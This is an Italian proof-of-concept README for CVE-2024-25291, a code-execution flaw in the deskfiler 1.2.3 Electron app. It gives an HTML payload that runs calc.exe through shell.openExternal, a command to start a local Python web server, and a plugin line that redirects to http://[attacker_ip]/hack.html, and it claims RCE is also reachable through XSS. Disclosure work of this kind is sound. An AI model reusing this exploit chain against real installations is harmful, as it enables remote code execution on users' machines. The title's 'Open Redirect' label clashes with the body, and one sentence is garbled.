
deskfiler 1.2.3 exploit Open Redirect
Una prova di concetto per la vulnerabilità CVE-2024-25291.
deskfiler - 1.2.3 consente la webview Electron nell'applicazione, con conseguente codice remoto
In questo repository è presente un'applicazione vulnerabile di esempio e il relativo exploit proof-of-concept (POC).
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ Se vuoi testarlo rapidamente, crea un server sul PC dell'attaccante con il seguente codice.
$ python -m http.server 80
Nota: ※ In questo momento, si presume che il plug-in sia un plug-in generato dall'attaccante e sia solo un plug-in normale con un codice aggiunto per consentire l'accesso al server dell'attaccante. BareBone è stato selezionato per un test semplice

Successivamente, aggiungi il seguente codice al file index.js nel percorso della cartella BareBone.
window.location='http://[attacker_ip]/hack.html'


In questo PoC abbiamo utilizzato un plug-in; tuttavia, riteniamo che con vettori di attacco alternativi sia possibile ottenere Remote Code Execution (RCE) in modo indipendente. Inoltre, se esistono vulnerabilità lato server come Stored XSS, Reflected XSS, la RCE è considerata fattibile.